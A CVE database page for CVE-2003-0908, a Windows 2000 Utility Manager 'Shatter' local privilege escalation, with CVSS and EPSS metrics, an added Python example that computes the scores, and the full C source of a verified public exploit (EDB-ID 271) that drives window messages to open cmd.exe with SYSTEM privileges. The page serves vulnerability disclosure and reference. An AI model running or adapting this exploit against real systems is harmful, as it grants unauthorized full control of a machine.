CVE-2003-0908 : Detail


EPSS score: 4.32% (V4)
Attack vector: Local
Published: 2004-04-16 02h00 +00:00
Last modified: 2018-10-12 17h57 +00:00

CVE Description

The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with system privileges, which allows local users to execute arbitrary code via a "Shatter" style attack using a Windows message that accesses the context sensitive help button in the GUI, as demonstrated using the File Open dialog in the Help window, a different vulnerability than CVE-2004-0213.

CVE Information

Metrics

Metrics | Score | Severity | CVSS Vector | Source
V2 | 7.2 | High | AV:L/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other scored CVEs. The percentile is therefore the figure to use when comparing one CVE's EPSS score against the rest of the population.
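The following is an added worked example, not part of the CVE record or the scoring vendors' code: it recomputes the CVSS v2 base score and NVD severity band from the vector shown in the Metrics table, and ranks an EPSS score as a percentile in the way the paragraph above describes. The CVSS weights and equations are the published CVSS v2.0 base equations; the EPSS figures in the sample set are constructed for illustration and are not real EPSS output, and the percentile convention used (share of scored CVEs at or below this CVE's score) is an assumption stated in the code.

```python
"""Added example: CVSS v2 base score / NVD severity from a vector string,
plus an EPSS percentile ranking over a constructed set of scores."""

import math

# CVSS v2.0 base-metric weights (CVSS v2.0 specification, base equation)
AV = {"L": 0.395, "A": 0.646, "N": 1.0}
AC = {"H": 0.35, "M": 0.61, "L": 0.71}
AU = {"M": 0.45, "S": 0.56, "N": 0.704}
CIA = {"N": 0.0, "P": 0.275, "C": 0.660}


def parse_v2_vector(vector):
    """Turn 'AV:L/AC:L/Au:N/C:C/I:C/A:C' into a dict; reject malformed vectors."""
    parts = dict(item.split(":", 1) for item in vector.split("/"))
    expected = {"AV", "AC", "Au", "C", "I", "A"}
    if set(parts) != expected:
        raise ValueError("CVSS v2 base vector must contain exactly %s" % sorted(expected))
    return parts


def round_to_1_decimal(x):
    """CVSS rounds to nearest with one decimal; avoid Python's banker's rounding."""
    return math.floor(x * 10 + 0.5) / 10


def cvss_v2_base_score(vector):
    """CVSS v2.0 base equation: Impact, Exploitability, f(Impact)."""
    m = parse_v2_vector(vector)
    impact = 10.41 * (1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]]))
    exploitability = 20 * AV[m["AV"]] * AC[m["AC"]] * AU[m["Au"]]
    f_impact = 0 if impact == 0 else 1.176   # all-None impact yields a 0.0 score
    return round_to_1_decimal((0.6 * impact + 0.4 * exploitability - 1.5) * f_impact)


def nvd_v2_severity(score):
    """NVD CVSS v2 severity bands: Low 0.0-3.9, Medium 4.0-6.9, High 7.0-10.0."""
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    return "Low"


def epss_percentile(scores, cve):
    """Assumed convention: share of all scored CVEs whose EPSS score is at or
    below this CVE's score (0.95 => more likely exploited than 95% of the set)."""
    target = scores[cve]
    at_or_below = sum(1 for s in scores.values() if s <= target)
    return at_or_below / len(scores)


if __name__ == "__main__":
    vector = "AV:L/AC:L/Au:N/C:C/I:C/A:C"   # the vector from the Metrics table
    score = cvss_v2_base_score(vector)
    print(vector, score, nvd_v2_severity(score))
    # constructed sample EPSS scores (probabilities 0..1), not real EPSS data
    sample = {"CVE-2003-0908": 0.0432, "CVE-A": 0.0009, "CVE-B": 0.0120,
              "CVE-C": 0.5100, "CVE-D": 0.0431}
    print(epss_percentile(sample, "CVE-2003-0908"))
```

Running the script prints 7.2 and High for the page's vector, matching the Metrics table; feed it a vector with C:N/I:N/A:N to see the f(Impact) special case collapse the score to 0.0.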

Exploit information

Exploit Database EDB-ID : 271

Publication date : 2004-04-14 22h00 +00:00
Author : Cesar Cerrudo
EDB Verified : Yes

// By Cesar Cerrudo cesar appsecinc com
// Local elevation of privileges exploit for Windows Utility Manager
// Gives you a shell with system privileges
// If you have problems try changing Sleep() values.

#include <stdio.h>
#include <windows.h>
#include <commctrl.h>
#include <Winuser.h>

int main(int argc, char *argv[])
{
    HWND lHandle, lHandle2;
    POINT point;
    // filename filter that leaves only cmd.exe in the Open dialog's list view
    char sText[] = "%windir%\\system32\\cmd.ex?";

    // run utility manager (runs with system privileges, shows a GUI on the user's desktop)
    system("utilman.exe /start");
    Sleep(500);

    // execute contextual help: winhlp32.exe is started with Utility Manager's privileges
    SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
    Sleep(500);

    // open the File Open dialog window in Windows Help
    PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
    Sleep(500);

    // find the Open file dialog window
    lHandle = FindWindow("#32770", "Open");
    // get the filename input box handle
    lHandle2 = GetDlgItem(lHandle, 0x47C);
    Sleep(500);

    // set text to filter the list view to display only cmd.exe
    SendMessage(lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
    Sleep(800);
    // send return
    SendMessage(lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

    // get navigation bar handle
    lHandle2 = GetDlgItem(lHandle, 0x4A0);
    // send tab
    SendMessage(lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
    Sleep(500);

    lHandle2 = FindWindowEx(lHandle, NULL, "SHELLDLL_DefView", NULL);
    // get list view handle
    lHandle2 = GetDlgItem(lHandle2, 0x1);
    SendMessage(lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
    SendMessage(lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
    SendMessage(lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
    Sleep(500);

    // pop up the context menu on the selected cmd.exe entry
    PostMessage(lHandle2, WM_CONTEXTMENU, 0, 0);
    Sleep(1000);

    // get context menu handle
    point.x = 10;
    point.y = 30;
    lHandle2 = WindowFromPoint(point);
    SendMessage(lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
    SendMessage(lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
    SendMessage(lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return: activates the menu entry, launching cmd.exe
    SendMessage(lHandle, WM_CLOSE, 0, 0);            // close the Open file dialog window
    return(0);
}

// milw0rm.com [2004-04-15]

Products Mentioned

Configuration 0

Microsoft >> Windows_2000 >> Version *

References

http://www.securityfocus.com/bid/10124
Tags : vdb-entry, x_refsource_BID
http://www.ciac.org/ciac/bulletins/o-114.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
http://www.kb.cert.org/vuls/id/526084
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.us-cert.gov/cas/techalerts/TA04-104A.html
Tags : third-party-advisory, x_refsource_CERT